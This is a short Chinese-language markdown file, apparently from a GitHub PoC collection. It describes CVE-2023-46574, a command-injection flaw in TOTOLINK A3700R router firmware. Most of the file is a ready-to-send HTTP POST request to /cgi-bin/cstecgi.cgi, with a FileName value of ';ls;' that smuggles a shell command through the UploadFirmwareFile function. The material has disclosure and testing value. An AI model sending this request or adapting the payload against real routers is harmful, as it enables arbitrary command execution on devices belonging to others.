Skip to content

Latest commit

 

History

History
33 lines (26 loc) · 1.11 KB

TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md

File metadata and controls

33 lines (26 loc) · 1.11 KB
Raw

TOTOLINK A3700R命令执行漏洞CVE-2023-46574

TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞,攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。

影响版本:

TOTOLINK A3700R v9.1.2u.6165_20211012

poc

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.122.15
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.122.15
Referer: http://192.168.122.15/basic/index.html?time=1697964093345
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1697964047:2
Connection: close


{"topicurl":"UploadFirmwareFile","FileName":";ls;"}

image

来源